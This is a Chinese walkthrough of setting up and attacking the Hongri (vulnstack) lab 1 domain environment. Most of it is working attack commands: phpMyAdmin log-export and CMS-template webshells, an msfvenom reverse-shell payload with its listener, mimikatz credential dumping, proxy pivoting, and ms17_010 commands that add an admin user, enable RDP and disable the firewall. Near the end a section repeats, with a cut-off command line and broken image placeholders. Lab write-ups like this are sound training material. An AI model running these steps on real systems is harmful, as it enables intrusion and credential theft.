红日靶场1(搭建打靶)
搭建
靶场下载:
http://vulnstack.qiyuanxuetang.net/vuln/detail/2/ (13G,需要百度网盘会员)
下载好靶场文件后直接解压
直接用虚拟机打开靶场
更改网络ip
需要模拟内网和外网两个网段, Win7 虚拟机相当于网关服务器,所以需要两张网卡,一个用来向外网提供web服务,一个是通向内网
将 Win7 的网络适配器 1 设置成 VMnet1 仅主机模式(内网),网络适配器 2 设置成 NAT 模式(外网)
而 Win2003、Win2008 网络适配器设置成VMnet1仅主机模式(内网)。
网络配置完成,这三台虚拟主机默认开机密码都是 hongrisec@2019(开机提示密码已过期,更改为 hongricse@2024即可,密码太简单会设置错误)
在之后可能会用到桥接模式,可以根据情况设置
在win7把环境启动,其中可以设置一个桥接模式,方便打靶
查看IP
访问192.168.129.158
这几台机器都是有防火墙的,这里先看一下win7的防火墙和入站规则
接着可以在外面访问一下192.168.129.158
到这里靶场就搭建成功了
开始打靶
攻击机 kali
web服务器 win7
域成员 win2003
域控 win2008
目的:先穿过防火墙打下web服务器接着再穿过防火墙拿下域内的机器(域成员和域控)。
打靶方法:
- 端口扫描
- web路径的发现
- phpmyadmin渗透
日志导出getshell
- yxcms渗透
编辑模板getshell
- 上线msf
- msf渗透利用
- msf psexec模板利用
- ms17_010_command模板利用
打靶
由于在打靶前知道了ip所以直接就不进行信息收集了
直接来扫描端口
nmap -p- 192.168.129.158 -o result.txt/nmap -sV -Pn 192.168.129.158
有80和3306端口开放
phpmyadmin渗透
访问192.168.129.158:80,得到的是一个phpstudy探针的页面,可以知道绝对路径
测试一下数据库的连接情况,使用root/root弱口令,连接测试成功
使用dirsearch工具或者御剑扫描一下存在的web服务
[08:42:52] 200 - 71KB - /phpinfo.php
[08:42:52] 301 - 242B - /phpMyAdmin -> http://192.168.129.158/phpMyAdmin/
[08:42:52] 301 - 242B - /phpmyadmin -> http://192.168.129.158/phpmyadmin/
[08:42:53] 200 - 32KB - /phpmyadmin/ChangeLog
[08:42:53] 200 - 2KB - /phpmyadmin/README
[08:42:53] 200 - 4KB - /phpmyAdmin/
[08:42:53] 200 - 4KB - /phpMyAdmin/index.php
[08:42:53] 200 - 4KB - /phpMyadmin/
[08:42:53] 200 - 4KB - /phpmyadmin/
[08:42:53] 200 - 4KB - /phpmyadmin/index.php
[08:42:53] 200 - 4KB - /phpMyAdmin/
扫描到这么多文件,接着就是访问
访问 http://192.168.129.158/phpMyAdmin/
使用刚刚得到的弱口令进行登录root/root
日志导出getshell
查看日志导出
show variables like ‘general%’;
发现日志导出没有打开,接着就要开启日志导出
set global general_log=“ON”;
接着设置web路径
set global general_log_file=“C:/phpStudy/www/404.php”;
执行select 1;
访问http://192.168.129.158/404.php查看日志
接着执行select “<?php phpinfo();?>”;
接着刷新http://192.168.129.158/404.php查看日志的导出
以上几步操作说明web是可以用日志导出getshell的
最简单的就是可以写入一句话木马执行,接着就可以用工具(蚁剑)连接到后台,得到文件
yxcms渗透
访问192.168.129.158/yxcms
查看网页发现用户和密码
根据网页提示访问得到新的网页
直接admin/123456登录
成功登录后台
进入前台模板——>模板管理——>编辑文件
这里可以直接打开编辑写入webshell
访问http://192.168.129.158/yxcms/protected/apps/default/view/default/info.php 页面什么都没有显示
使用hackbar,传入刚刚写入的phpinfo
接着用蚁剑连接
可以进入文件管理和虚拟终端,在虚拟终端可以看到用户名及身份
msf上线
先进入msf工具使用页面
在kali使用msf工具生成木马文件
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.129.148 LPORT=4444 -f exe > 11.exe
成功将木马文件上传到web服务器
文件成功在终端显示
在kali上开启监听
msfconsole #开启msf
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
show options #可以查看一下写的内容
set lhost 192.168.33.133 #ip写kali的
set lport 3333 #监听端口
run #启动
设置好kali执行文件,getshell
内网信息收集
net time /domain #查看时间服务器
net user /domain #查看域用户
net view /domain #查看有几个域
net view /domain:GOD #查看GOD域情况
nslookup 主机名 #查看域内其他主机 可能ip查不出来
net group “domain computers” /domain #查看域内所有的主机名
net group “domain admins” /domain #查看域管理员
net group “domain controllers” /domain #查看域控
获取目标主机的shell
shell #进入模拟终端
chcp 65001 #解决乱码
route print # 打印路由信息
可知内网网段应该是 192.168.52.0/24
首先判断是否在域中,域控制器一般集成了DNS服务,通过 ipconfig /all,即可简单判断
域名为god.org,还可以使用下面这种方法查看
net view /domain #查询当前主机是否加入域,如果加入则列出域名
查看域内信息
net config Workstation #查看计算机名、全名、用户名、系统版本、工作站、域、登录域
接着定位域控
域控的域名即 owa.god.org ,用 ping 即可反查出域控(server 2008)ip为192.168.52.138
再来看一下域内的其它主机,OWA是域控,STU1是win7,所以剩下的就是域成员得到ip为192.168.52.141
再来看一下域管理员,可以看到这里我们获得的 Administrator 就是域控OWA的域管理员
net group “domain admins” /domain #查询域管理员
看一下域里有几个用户
net user /domain #查看域用户,只有域管才能执行
提权
getuid #查看服务器权限
getsystem #提权
getuid #查看是否提权成功
成功得到系统权限
获取域用户的密码信息
方法一:加载 kiwi模块
load kiwi #加载kiwi模块
creds_all #列出所有凭据
方法二:加载mimikatz模块,再尝试加载 mimikatz 模块,加载模块前需要先将meterpreter迁移到64位的进程
ps #查看进程
migrate PID
load mimikatz
kiwi_cmd sekurlsa::logonpasswords
方法一不知道为什么一直显示不出来
方法二:
ps
得到账户及登录密码,密码和我一开始更改的一样
目前为止,获得的内网信息有:
域名:god.org
域内有五个用户:Administrator、Guest、liukaifeng01、ligang、krbtgt
域内三台主机:OWA、ROOT-TVI862UBEH(192.168.52.141)、STU1(win7)
域控:OWA(192.168.52.138)
win7内网ip:192.168.52.143
跨网段横向渗透
msf添加代理
添加路由
run autoroute -s 192.168.52.0/24 #添加路由
run autoroute -p #查看路由信息
配置代理
background
use auxiliary/server/socks_proxy
set SRVHOST 127.0.0.1(这里因为是本机可以写本地ip)
run
jobs
然后在 proxychains 的配置文件 /etc/proxychains.conf,添加本机的1080端口:
socks4 127.0.0.1 1080
域成员渗透
首先看下域成员开放的端口,全扫很久,这里只扫描一些高危端口
proxychains nmap -sV -Pn -p 22,80,135,443,445,3389 192.168.52.141
这里看见开着445端口,试着用一下ms17_010
use auxiliary/admin/smb/ms17_010_command
set COMMAND net user
set RHOST 192.168.52.141
run
添加一个用户尝试远程登录一下
还是使用这个模块,依次执行下面命令
set command net user bbb qwer@123 /add #添加用户
run
set command net localgroup administrators bbb /add #管理员权限
run
set command ‘REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口
run
set command netsh advfirewall set allprofiles state off #关闭防火墙
run
接着远程登录
proxychains rdesktop 192.168.52.141
使用刚刚添加的新用户进行登录,而且原来的用户账户及密码也拿到了
对于另一台机器192.168.52.138的获取也是一样的操作
先连接创建新用户,赋予其权限
Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f’ #开启3389端口
run
set command netsh advfirewall set allprofiles state off #关闭防火墙
run
[外链图片转存中…(img-DoUuluZW-1734439783074)][外链图片转存中…(img-pquuSHzj-1734439783074)][外链图片转存中…(img-QvoP0AOc-1734439783074)]接着远程登录
proxychains rdesktop 192.168.52.141
使用刚刚添加的新用户进行登录,而且原来的用户账户及密码也拿到了
对于另一台机器192.168.52.138的获取也是一样的操作
先连接创建新用户,赋予其权限
然后直接远程登录